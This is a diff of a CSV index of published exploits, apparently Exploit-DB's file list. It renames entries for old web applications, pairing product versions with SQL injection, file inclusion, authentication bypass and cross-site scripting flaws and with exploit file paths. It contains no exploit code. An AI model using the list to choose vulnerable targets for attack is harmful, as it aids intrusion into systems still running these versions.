@ -19434,7 +19448,7 @@ id,file,description,date,author,platform,type,port
6557,platforms/php/webapps/6557.txt,"ADN Forum 1.0b - Insecure Cookie Handling",2008-09-24,Pepelux,php,webapps,0
6558,platforms/php/webapps/6558.txt,"barcodegen 2.0.0 - Local File Inclusion",2008-09-24,dun,php,webapps,0
6559,platforms/php/webapps/6559.txt,"Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities",2008-09-24,dun,php,webapps,0
6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum - (seller_id) SQL Injection",2008-09-25,InjEctOr5,php,webapps,0
6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum - 'seller_id' Parameter SQL Injection",2008-09-25,InjEctOr5,php,webapps,0
6562,platforms/php/webapps/6562.txt,"LanSuite 3.3.2 - (design) Local File Inclusion",2008-09-25,dun,php,webapps,0
6563,platforms/php/webapps/6563.txt,"PHPOCS 0.1-beta3 - (index.php act) Local File Inclusion",2008-09-25,dun,php,webapps,0
6564,platforms/php/webapps/6564.txt,"Vikingboard 0.2 Beta - (task) Local File Inclusion",2008-09-25,dun,php,webapps,0
@ -19599,7 +19613,7 @@ id,file,description,date,author,platform,type,port
6779,platforms/php/webapps/6779.txt,"phpFastNews 1.0.0 - Insecure Cookie Handling",2008-10-18,Qabandi,php,webapps,0
6780,platforms/php/webapps/6780.txt,"zeeproperty - 'adid' SQL Injection",2008-10-18,"Hussin X",php,webapps,0
6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection",2008-10-18,Xianur0,php,webapps,0
6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 - (del.php) Blind SQL Injection",2008-10-18,StAkeR,php,webapps,0
6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 - 'del.php' Blind SQL Injection",2008-10-18,StAkeR,php,webapps,0
6783,platforms/php/webapps/6783.php,"Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload",2008-10-18,EgiX,php,webapps,0
6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader 1.5 - Remote File Creation",2008-10-18,StAkeR,php,webapps,0
6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite - (init.php) Remote File Inclusion",2008-10-19,NoGe,php,webapps,0
@ -19709,12 +19723,11 @@ id,file,description,date,author,platform,type,port
6923,platforms/php/webapps/6923.txt,"SFS EZ Pub Site - 'Directory.php cat' SQL Injection",2008-11-01,Hakxer,php,webapps,0
6924,platforms/php/webapps/6924.txt,"SFS EZ Gaming Cheats - 'id' SQL Injection",2008-11-01,ZoRLu,php,webapps,0
6925,platforms/php/webapps/6925.txt,"Bloggie Lite 0.0.2 Beta - SQL Injection by Insecure Cookie Handling",2008-11-01,JosS,php,webapps,0
6927,platforms/php/webapps/6927.txt,"AJ Article - 'featured_article.php mode' SQL Injection",2008-11-01,Mr.SQL,php,webapps,0
6928,platforms/php/webapps/6928.txt,"Joomla! Component Flash Tree Gallery 1.0 - Remote File Inclusion",2008-11-01,NoGe,php,webapps,0
6929,platforms/php/webapps/6929.txt,"Graugon PHP Article Publisher Pro 1.5 - Insecure Cookie Handling",2008-11-01,ZoRLu,php,webapps,0
6930,platforms/php/webapps/6930.txt,"GO4I.NET ASP Forum 1.0 - (forum.asp iFor) SQL Injection",2008-11-01,Bl@ckbe@rD,php,webapps,0
6931,platforms/php/webapps/6931.txt,"YourFreeWorld Programs Rating - 'details.php id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0
6932,platforms/php/webapps/6932.txt,"AJ ARTICLE - (Authentication Bypass) SQL Injection",2008-11-01,Hakxer,php,webapps,0
6932,platforms/php/webapps/6932.txt,"AJ Article 1.0 - Authentication Bypass",2008-11-01,Hakxer,php,webapps,0
6933,platforms/php/webapps/6933.pl,"Micro CMS 0.3.5 - Remote Add/Delete/Password Change Exploit",2008-11-01,StAkeR,php,webapps,0
6934,platforms/php/webapps/6934.txt,"Shahrood - 'ndetail.php id' Blind SQL Injection",2008-11-01,BazOka-HaCkEr,php,webapps,0
6935,platforms/php/webapps/6935.txt,"YourFreeWorld Downline Builder - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0
@ -19835,7 +19848,7 @@ id,file,description,date,author,platform,type,port
7062,platforms/php/webapps/7062.txt,"ZeeJobsite 2.0 - Arbitrary File Upload",2008-11-08,ZoRLu,php,webapps,0
7063,platforms/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,php,webapps,0
7064,platforms/php/webapps/7064.pl,"Mambo Component 'com_n-forms' - 'form_id' Parameter Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0
7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - (css.php theme) Local File Inclusion",2008-11-08,dun,php,webapps,0
7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - 'theme' Parameter Local File Inclusion",2008-11-08,dun,php,webapps,0
7066,platforms/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass",2008-11-08,G4N0K,php,webapps,0
7067,platforms/asp/webapps/7067.txt,"DigiAffiliate 1.4 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,asp,webapps,0
7068,platforms/php/webapps/7068.txt,"Mole Group Airline Ticket Script - (Authentication Bypass) SQL Injection",2008-11-08,Cyber-Zone,php,webapps,0
@ -19850,7 +19863,7 @@ id,file,description,date,author,platform,type,port
7078,platforms/php/webapps/7078.txt,"Joomla! Component JooBlog 0.1.1 - (PostID) SQL Injection",2008-11-10,boom3rang,php,webapps,0
7079,platforms/php/webapps/7079.txt,"FREEsimplePHPGuestbook - 'Guestbook.php' Remote Code Execution",2008-11-10,GoLd_M,php,webapps,0
7080,platforms/php/webapps/7080.txt,"fresh email script 1.0 - Multiple Vulnerabilities",2008-11-10,Don,php,webapps,0
7081,platforms/php/webapps/7081.txt,"AJ ARTICLE - Remote Authentication Bypass",2008-11-10,G4N0K,php,webapps,0
7081,platforms/php/webapps/7081.txt,"AJ Article 1.0 - Remote Authentication Bypass",2008-11-10,G4N0K,php,webapps,0
7082,platforms/php/webapps/7082.txt,"PHPStore Car Dealers - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0
7083,platforms/php/webapps/7083.txt,"PHPStore PHP Job Search Script - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0
7084,platforms/php/webapps/7084.txt,"PHPStore Complete Classifieds Script - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0
@ -19901,7 +19914,7 @@ id,file,description,date,author,platform,type,port
7147,platforms/php/webapps/7147.txt,"SaturnCMS - (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0
7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - (index.php serverid) SQL Injection",2008-11-17,eek,php,webapps,0
7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 - Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0
7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - (viewalbums.php artistId) SQL Injection",2008-11-18,snakespc,php,webapps,0
7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - 'viewalbums.php' SQL Injection",2008-11-18,snakespc,php,webapps,0
7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - (g_pcltar_lib_dir) Local File Inclusion",2008-11-18,DSecRG,php,webapps,0
7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - (API_HOME_DIR) Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps,0
7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 - Insecure Cookie Handling",2008-11-18,x0r,php,webapps,0
@ -20415,7 +20428,7 @@ id,file,description,date,author,platform,type,port
7833,platforms/php/webapps/7833.php,"Joomla! Component com_waticketsystem - Blind SQL Injection",2009-01-19,InjEctOr5,php,webapps,0
7834,platforms/php/webapps/7834.txt,"Ninja Blog 4.8 - Cross-Site Request Forgery/HTML Injection",2009-01-19,"Danny Moules",php,webapps,0
7835,platforms/php/webapps/7835.htm,"Max.Blog 1.0.6 - Arbitrary Delete Post Exploit",2009-01-20,SirGod,php,webapps,0
7836,platforms/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 - 'id' SQL Injection",2009-01-20,snakespc,php,webapps,0
7836,platforms/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 - 'id' Parameter SQL Injection",2009-01-20,snakespc,php,webapps,0
7837,platforms/php/webapps/7837.pl,"LinPHA Photo Gallery 2.0 - Remote Command Execution",2009-01-20,Osirys,php,webapps,0
7838,platforms/php/webapps/7838.txt,"Dodo's Quiz Script 1.1 - (dodosquiz.php) Local File Inclusion",2009-01-20,Stack,php,webapps,0
7840,platforms/php/webapps/7840.pl,"Joomla! Component Com BazaarBuilder Shopping Cart 5.0 - SQL Injection",2009-01-21,XaDoS,php,webapps,0
@ -20868,7 +20881,7 @@ id,file,description,date,author,platform,type,port
8655,platforms/php/webapps/8655.pl,"microTopic 1 - (Rating) Blind SQL Injection",2009-05-11,YEnH4ckEr,php,webapps,0
8658,platforms/php/webapps/8658.txt,"PHP recommend 1.3 - (Authentication Bypass / Remote File Inclusion / Code Inject) Multiple Vulnerabilities",2009-05-11,scriptjunkie,php,webapps,0
8659,platforms/php/webapps/8659.php,"Bitweaver 2.6 - saveFeed() Remote Code Execution",2009-05-12,Nine:Situations:Group,php,webapps,0
8664,platforms/php/webapps/8664.pl,"BigACE CMS 2.5 - 'Username' SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0
8664,platforms/php/webapps/8664.pl,"BigACE 2.5 - SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0
8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 - (script) Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0
8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 - Insecure Cookie Handling",2009-05-13,Mr.tro0oqy,php,webapps,0
8671,platforms/php/webapps/8671.pl,"Family Connections CMS 1.9 - (member) SQL Injection",2009-05-13,YEnH4ckEr,php,webapps,0
@ -20984,7 +20997,7 @@ id,file,description,date,author,platform,type,port
8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - (Authentication Bypass) SQL Injection",2009-05-29,TiGeR-Dz,php,webapps,0
8827,platforms/php/webapps/8827.txt,"ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities",2009-05-29,Securitylab.ir,php,webapps,0
8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 - (Authentication Bypass) SQL Injection",2009-05-29,"sniper code",php,webapps,0
8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - 'maincatid' SQL Injection",2009-05-29,Br0ly,php,webapps,0
8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - 'maincatid' Parameter SQL Injection",2009-05-29,Br0ly,php,webapps,0
8830,platforms/php/webapps/8830.txt,"Million Dollar Text Links 1.0 - 'id' SQL Injection",2009-05-29,Qabandi,php,webapps,0
8831,platforms/php/webapps/8831.txt,"Traidnt Up 2.0 - (Authentication Bypass / Cookie) SQL Injection",2009-05-29,Qabandi,php,webapps,0
8834,platforms/php/webapps/8834.pl,"RadCLASSIFIEDS Gold 2 - (seller) SQL Injection",2009-06-01,Br0ly,php,webapps,0
@ -21147,7 +21160,7 @@ id,file,description,date,author,platform,type,port
9049,platforms/php/webapps/9049.txt,"DM FileManager 3.9.4 - Remote File Disclosure",2009-06-30,Stack,php,webapps,0
9050,platforms/php/webapps/9050.pl,"SMF Mod Member Awards 1.0.2 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0
9051,platforms/php/webapps/9051.txt,"jax formmailer 3.0.0 - Remote File Inclusion",2009-06-30,ahmadbady,php,webapps,0
9052,platforms/php/webapps/9052.txt,"BigACE CMS 2.6 - (cmd) Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0
9052,platforms/php/webapps/9052.txt,"BigACE 2.6 - 'cmd' Parameter Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0
9053,platforms/php/webapps/9053.txt,"phpMyBlockchecker 1.0.0055 - Insecure Cookie Handling",2009-06-30,SirGod,php,webapps,0
9054,platforms/php/webapps/9054.txt,"WordPress Plugin Related Sites 2.1 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0
9055,platforms/php/webapps/9055.pl,"PunBB Affiliates Mod 1.1 - Blind SQL Injection",2009-06-30,Dante90,php,webapps,0
@ -21195,7 +21208,7 @@ id,file,description,date,author,platform,type,port
9127,platforms/php/webapps/9127.txt,"d.net CMS - Arbitrary Reinstall/Blind SQL Injection",2009-07-11,darkjoker,php,webapps,0
9129,platforms/php/webapps/9129.txt,"censura 1.16.04 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-12,Vrs-hCk,php,webapps,0
9130,platforms/php/webapps/9130.txt,"PHP AdminPanel Free 1.0.5 - Remote File Disclosure",2009-07-12,"Khashayar Fereidani",php,webapps,0
9132,platforms/php/webapps/9132.py,"RunCMS 1.6.3 - (double ext) Remote Shell Injection",2009-07-13,StAkeR,php,webapps,0
9132,platforms/php/webapps/9132.py,"RunCMS 1.6.3 - Remote Shell Injection",2009-07-13,StAkeR,php,webapps,0
9138,platforms/php/webapps/9138.txt,"onepound shop 1.x - products.php SQL Injection",2009-07-13,Affix,php,webapps,0
9140,platforms/cgi/webapps/9140.txt,"DJ Calendar - 'DJcalendar.cgi TEMPLATE' File Disclosure",2009-07-14,cibbao,cgi,webapps,0
9144,platforms/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure",2009-07-14,Qabandi,php,webapps,0
@ -21367,7 +21380,7 @@ id,file,description,date,author,platform,type,port
9441,platforms/php/webapps/9441.txt,"MyWeight 1.0 - Arbitrary File Upload",2009-08-14,Mr.tro0oqy,php,webapps,0
9444,platforms/php/webapps/9444.txt,"PHP-Lance 1.52 - Multiple Local File Inclusion",2009-08-18,jetli007,php,webapps,0
9445,platforms/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection",2009-08-18,"Khashayar Fereidani",php,webapps,0
9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - (store.php id) SQL Injection",2009-08-18,NoGe,php,webapps,0
9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - 'id' Parameter SQL Injection",2009-08-18,NoGe,php,webapps,0
9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0
9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - (Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-18,USH,php,webapps,0
9451,platforms/php/webapps/9451.txt,"DreamPics Builder - (exhibition_id) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
@ -21569,8 +21582,8 @@ id,file,description,date,author,platform,type,port
16007,platforms/php/webapps/16007.txt,"AneCMS 1.3 - Persistent Cross-Site Scripting",2011-01-17,Penguin,php,webapps,0
9962,platforms/php/webapps/9962.txt,"Piwik 1357 2009-08-02 - Arbitrary File Upload / Code Execution",2009-10-19,boecke,php,webapps,0
9963,platforms/asp/webapps/9963.txt,"QuickTeam 2.2 - SQL Injection",2009-10-14,"drunken danish rednecks",asp,webapps,0
9964,platforms/php/webapps/9964.txt,"RunCMS 2m1 - store() SQL Injection",2009-10-26,bookoo,php,webapps,0
9965,platforms/php/webapps/9965.txt,"RunCMS 2ma - post.php SQL Injection",2009-10-26,bookoo,php,webapps,0
9964,platforms/php/webapps/9964.txt,"RunCMS 2m1 - 'store()' SQL Injection",2009-10-26,bookoo,php,webapps,0
9965,platforms/php/webapps/9965.txt,"RunCMS 2ma - 'post.php' SQL Injection",2009-10-26,bookoo,php,webapps,0
9967,platforms/asp/webapps/9967.txt,"SharePoint 2007 - Team Services Source Code Disclosure",2009-10-26,"Daniel Martin",asp,webapps,0
33434,platforms/windows/webapps/33434.rb,"HP Release Control - Authenticated XXE (Metasploit)",2014-05-19,"Brandon Perry",windows,webapps,80
9975,platforms/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Cross-Site Scripting / Cross-Site Request Forgery",2009-11-16,"Alexey Sintsov",hardware,webapps,80
@ -23604,7 +23617,7 @@ id,file,description,date,author,platform,type,port
14350,platforms/php/webapps/14350.txt,"Joomla! Component 'com_qcontacts' - SQL Injection",2010-07-13,_mlk_,php,webapps,0
14351,platforms/php/webapps/14351.txt,"I-net Enquiry Management Script - SQL Injection",2010-07-13,D4rk357,php,webapps,0
14353,platforms/php/webapps/14353.html,"Diferior CMS 8.03 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-13,10n1z3d,php,webapps,0
14354,platforms/php/webapps/14354.txt,"AJ Article - Persistent Cross-Site Scripting",2010-07-13,Sid3^effects,php,webapps,0
14354,platforms/php/webapps/14354.txt,"AJ Article 3.0 - Cross-Site Scripting",2010-07-13,Sid3^effects,php,webapps,0
14356,platforms/php/webapps/14356.txt,"CustomCMS - Persistent Cross-Site Scripting",2010-07-13,Sid3^effects,php,webapps,0
14357,platforms/php/webapps/14357.txt,"2DayBiz Businesscard Script - Authentication Bypass",2010-07-14,D4rk357,php,webapps,0
14362,platforms/php/webapps/14362.txt,"CMSQLite - SQL Injection",2010-07-14,"High-Tech Bridge SA",php,webapps,0
@ -25586,7 +25599,7 @@ id,file,description,date,author,platform,type,port
20987,platforms/asp/webapps/20987.txt,"Citrix Nfuse 1.51 - Webroot Disclosure",2001-07-02,sween,asp,webapps,0
20995,platforms/php/webapps/20995.txt,"Cobalt Qube Webmail 1.0 - Directory Traversal",2001-07-05,kf,php,webapps,0
20996,platforms/php/webapps/20996.txt,"Basilix Webmail 1.0 - File Disclosure",2001-07-06,"karol _",php,webapps,0
21005,platforms/php/webapps/21005.txt,"admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0
21005,platforms/php/webapps/21005.txt,"Admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0
21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition - 'add_rating.php id Parameter' Blind SQL Injection",2012-09-02,DaOne,php,webapps,0
21022,platforms/php/webapps/21022.txt,"PHPLib Team PHPLIB 7.2 - Remote Script Execution",2001-07-21,"giancarlo pinerolo",php,webapps,0
21032,platforms/hardware/webapps/21032.txt,"Conceptronic Grab'n'Go Network Storage - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0
@ -27972,7 +27985,7 @@ id,file,description,date,author,platform,type,port
26182,platforms/php/webapps/26182.txt,"Land Down Under 800 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-08-20,bl2k,php,webapps,0
26183,platforms/php/webapps/26183.txt,"NEPHP 3.0.4 - browse.php Cross-Site Scripting",2005-08-22,bl2k,php,webapps,0
26184,platforms/php/webapps/26184.txt,"PHPKit 1.6.1 - 'member.php' SQL Injection",2005-08-22,phuket,php,webapps,0
26186,platforms/php/webapps/26186.txt,"RunCMS 1.1/1.2 Newbb_plus and Messages Modules - Multiple SQL Injections",2005-08-22,"James Bercegay",php,webapps,0
26186,platforms/php/webapps/26186.txt,"RunCMS 1.1/1.2 Module Newbb_plus/Messages - SQL Injection",2005-08-22,"James Bercegay",php,webapps,0
26187,platforms/php/webapps/26187.txt,"PostNuke 0.76 RC4b - Comments Module moderate Parameter Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0
26188,platforms/php/webapps/26188.txt,"PostNuke 0.76 RC4b - user.php htmltext Parameter Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0
26189,platforms/php/webapps/26189.txt,"PostNuke 0.75/0.76 DL - viewdownload.php SQL Injection",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0
@ -28583,7 +28596,7 @@ id,file,description,date,author,platform,type,port
26962,platforms/php/webapps/26962.txt,"PHPSlash 0.8.1 - article.php SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0
26963,platforms/asp/webapps/26963.txt,"Quantum Art QP7.Enterprise - news_and_events_new.asp p_news_id Parameter SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0
26964,platforms/asp/webapps/26964.txt,"Quantum Art QP7.Enterprise - news.asp p_news_id Parameter SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0
26965,platforms/php/webapps/26965.txt,"MusicBox 2.3 - Type Parameter SQL Injection",2005-12-22,"Medo HaCKer",php,webapps,0
26965,platforms/php/webapps/26965.txt,"MusicBox 2.3 - 'type' Parameter SQL Injection",2005-12-22,"Medo HaCKer",php,webapps,0
26968,platforms/php/webapps/26968.txt,"SyntaxCMS - Search Query Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps,0
26969,platforms/asp/webapps/26969.txt,"Tangora Portal CMS 4.0 - Action Parameter Cross-Site Scripting",2005-12-22,r0t3d3Vil,asp,webapps,0
26972,platforms/jsp/webapps/26972.txt,"oracle Application server discussion forum portlet - Multiple Vulnerabilities",2005-12-23,"Johannes Greil",jsp,webapps,0
@ -28651,7 +28664,7 @@ id,file,description,date,author,platform,type,port
27357,platforms/php/webapps/27357.txt,"Simplog 1.0.2 - Information Disclosure",2006-03-04,Retard,php,webapps,0
27358,platforms/php/webapps/27358.txt,"DVGuestbook 1.0/1.2.2 - 'index.php' page Parameter Cross-Site Scripting",2006-03-06,Liz0ziM,php,webapps,0
27359,platforms/php/webapps/27359.txt,"DVGuestbook 1.0/1.2.2 - dv_gbook.php f Parameter Cross-Site Scripting",2006-03-06,Liz0ziM,php,webapps,0
27360,platforms/php/webapps/27360.txt,"RunCMS 1.x - Bigshow.php Cross-Site Scripting",2006-03-06,"Roozbeh Afrasiabi",php,webapps,0
27360,platforms/php/webapps/27360.txt,"RunCMS 1.x - 'Bigshow.php' Cross-Site Scripting",2006-03-06,"Roozbeh Afrasiabi",php,webapps,0
27042,platforms/ios/webapps/27042.txt,"Photo Server 2.0 iOS - Multiple Vulnerabilities",2013-07-23,Vulnerability-Lab,ios,webapps,0
27048,platforms/php/webapps/27048.txt,"AppServ Open Project 2.4.5 - Remote File Inclusion",2006-01-09,Xez,php,webapps,0
27052,platforms/php/webapps/27052.txt,"427BB 2.2 - showthread.php SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
@ -28788,7 +28801,7 @@ id,file,description,date,author,platform,type,port
27223,platforms/php/webapps/27223.txt,"dotProject 2.0 - /modules/public/calendar.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0
27224,platforms/php/webapps/27224.txt,"dotProject 2.0 - /modules/public/date_format.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0
27225,platforms/php/webapps/27225.txt,"dotProject 2.0 - /modules/tasks/gantt.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0
27226,platforms/php/webapps/27226.txt,"RunCMS 1.2/1.3 - PMLite.php SQL Injection",2006-02-14,"Hamid Ebadi",php,webapps,0
27226,platforms/php/webapps/27226.txt,"RunCMS 1.2/1.3 - 'PMLite.php' SQL Injection",2006-02-14,"Hamid Ebadi",php,webapps,0
27227,platforms/php/webapps/27227.txt,"WordPress 2.0 - Comment Post HTML Injection",2006-02-15,imei,php,webapps,0
27228,platforms/php/webapps/27228.txt,"Mantis 0.x/1.0 - view_all_set.php Multiple Parameter Cross-Site Scripting",2006-02-15,"Thomas Waldegger",php,webapps,0
27229,platforms/php/webapps/27229.txt,"Mantis 0.x/1.0 - manage_user_page.php sort Parameter Cross-Site Scripting",2006-02-15,"Thomas Waldegger",php,webapps,0
@ -28809,7 +28822,7 @@ id,file,description,date,author,platform,type,port
27252,platforms/php/webapps/27252.txt,"CuteNews 1.4.1 - show_news.php Cross-Site Scripting",2006-02-20,imei,php,webapps,0
27254,platforms/php/webapps/27254.txt,"PostNuke 0.6x/0.7x NS-Languages Module - language Parameter Cross-Site Scripting",2006-02-21,"Maksymilian Arciemowicz",php,webapps,0
27255,platforms/php/webapps/27255.txt,"PostNuke 0.6x/0.7x NS-Languages Module - language Parameter SQL Injection",2006-02-21,"Maksymilian Arciemowicz",php,webapps,0
27256,platforms/php/webapps/27256.txt,"RunCMS 1.x - Ratefile.php Cross-Site Scripting",2006-02-22,"Roozbeh Afrasiabi",php,webapps,0
27256,platforms/php/webapps/27256.txt,"RunCMS 1.x - 'Ratefile.php' Cross-Site Scripting",2006-02-22,"Roozbeh Afrasiabi",php,webapps,0
27259,platforms/php/webapps/27259.txt,"Noah's Classifieds 1.0/1.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,trueend5,php,webapps,0
27260,platforms/php/webapps/27260.txt,"Noah's Classifieds 1.0/1.3 - Search Page SQL Injection",2006-02-22,trueend5,php,webapps,0
27261,platforms/php/webapps/27261.txt,"Noah's Classifieds 1.0/1.3 - Local File Inclusion",2006-02-22,trueend5,php,webapps,0
@ -28827,7 +28840,7 @@ id,file,description,date,author,platform,type,port
27272,platforms/php/webapps/27272.txt,"SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload",2013-08-02,spyk2r,php,webapps,0
27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php rang Parameter' SQL Injection",2013-08-02,Raw-x,php,webapps,0
27275,platforms/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,cr4wl3r,php,webapps,0
27276,platforms/php/webapps/27276.html,"BigACE CMS 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0
27276,platforms/php/webapps/27276.html,"BigACE 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0
27279,platforms/php/webapps/27279.txt,"vtiger CRM 5.4.0 (SOAP Services) - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0
27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - (pages.php page_name Parameter) SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0
27283,platforms/hardware/webapps/27283.txt,"D-Link DIR-645 1.03B08 - Multiple Vulnerabilities",2013-08-02,"Roberto Paleari",hardware,webapps,0
@ -28941,9 +28954,9 @@ id,file,description,date,author,platform,type,port
27990,platforms/php/webapps/27990.txt,"Calendar Express 2.2 - month.php SQL Injection",2006-06-07,"CrAzY CrAcKeR",php,webapps,0
27443,platforms/php/webapps/27443.txt,"Extcalendar 1.0 - Cross-Site Scripting",2006-03-18,Soothackers,php,webapps,0
27444,platforms/php/webapps/27444.txt,"Woltlab Burning Board 2.3.4 - Class_DB_MySQL.php Cross-Site Scripting",2006-03-18,r57shell,php,webapps,0
27445,platforms/php/webapps/27445.txt,"MusicBox 2.3 - 'index.php' Multiple Parameter SQL Injection",2006-03-18,Linux_Drox,php,webapps,0
27446,platforms/php/webapps/27446.txt,"MusicBox 2.3 - 'index.php' Multiple Parameter Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0
27447,platforms/php/webapps/27447.txt,"MusicBox 2.3 - cart.php Multiple Parameter Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0
27445,platforms/php/webapps/27445.txt,"MusicBox 2.3 - 'index.php' SQL Injection",2006-03-18,Linux_Drox,php,webapps,0
27446,platforms/php/webapps/27446.txt,"MusicBox 2.3 - 'index.php' Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0
27447,platforms/php/webapps/27447.txt,"MusicBox 2.3 - 'cart.php' Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0
27448,platforms/php/webapps/27448.txt,"phpWebSite 0.8.2/0.8.3 - friend.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0
27449,platforms/php/webapps/27449.txt,"phpWebSite 0.8.2/0.8.3 - article.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0
27450,platforms/php/webapps/27450.txt,"WinHKI 1.4/1.5/1.6 - Directory Traversal",2006-02-24,raphael.huck@free.fr,php,webapps,0
@ -29516,7 +29529,7 @@ id,file,description,date,author,platform,type,port
28255,platforms/php/webapps/28255.txt,"Chameleon LE 1.203 - 'index.php' Directory Traversal",2006-07-21,kicktd,php,webapps,0
28260,platforms/php/webapps/28260.txt,"Lussumo Vanilla 1.0 - RootDirectory Remote File Inclusion",2006-07-24,MFox,php,webapps,0
28261,platforms/php/webapps/28261.txt,"RadScripts - a_editpage.php Filename Variable Arbitrary File Overwrite",2006-07-24,INVENT,php,webapps,0
28262,platforms/php/webapps/28262.txt,"MusicBox 2.3.4 - Page Parameter SQL Injection",2006-07-24,"EllipSiS Security",php,webapps,0
28262,platforms/php/webapps/28262.txt,"MusicBox 2.3.4 - 'page' Parameter SQL Injection",2006-07-24,"EllipSiS Security",php,webapps,0
28264,platforms/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 - Include.PCchess.php Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0
28267,platforms/php/webapps/28267.txt,"LinksCaffe 3.0 - links.php Multiple Parameter SQL Injection",2006-07-25,simo64,php,webapps,0
28268,platforms/php/webapps/28268.txt,"LinksCaffe 3.0 - counter.php tablewidth Parameter Cross-Site Scripting",2006-07-25,simo64,php,webapps,0
@ -29586,7 +29599,7 @@ id,file,description,date,author,platform,type,port
28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x - 'index.php' Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,php,webapps,0
